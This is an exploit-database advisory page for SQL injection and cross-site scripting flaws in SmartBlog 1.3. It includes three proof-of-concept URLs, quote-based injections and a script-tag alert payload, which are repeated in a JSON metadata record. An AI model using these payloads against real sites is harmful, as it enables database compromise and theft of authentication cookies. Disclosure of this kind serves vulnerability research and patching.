Search...

SmartBlog 1.3 SQL Injection and Cross-Site Scripting Vulnerabilities

2010-04-27T00:00:00

ID EDB-ID:33889
Type exploitdb
Reporter indoushka
Modified 2010-04-27T00:00:00

Description

SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/39756/info

SmartBlog is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SmartBlog 1.3 is vulnerable; other versions may also be affected.

http://www.example.com/v1.3/?mois=%2527&an=2010
http://www.example.com/v1.3/commentaire.php?id='
http://www.example.com/v1.3/?mois=3&an=&gt;"&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;

JSON Vulners Source

Initial Source

{"id": "EDB-ID:33889", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SmartBlog 1.3 SQL Injection and Cross-Site Scripting Vulnerabilities", "description": "SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities. Webapps exploit for php platform", "published": "2010-04-27T00:00:00", "modified": "2010-04-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/33889/", "reporter": "indoushka", "references": [], "cvelist": [], "lastseen": "2016-02-03T20:04:58", "viewCount": 1, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-03T20:04:58", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-03T20:04:58", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/33889/", "sourceData": "source: http://www.securityfocus.com/bid/39756/info\r\n\r\nSmartBlog is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nSmartBlog 1.3 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/v1.3/?mois=%2527&an=2010\r\nhttp://www.example.com/v1.3/commentaire.php?id='\r\nhttp://www.example.com/v1.3/?mois=3&an=>\"><ScRiPt>alert(213771818860)</ScRiPt>\r\n", "osvdbidlist": []}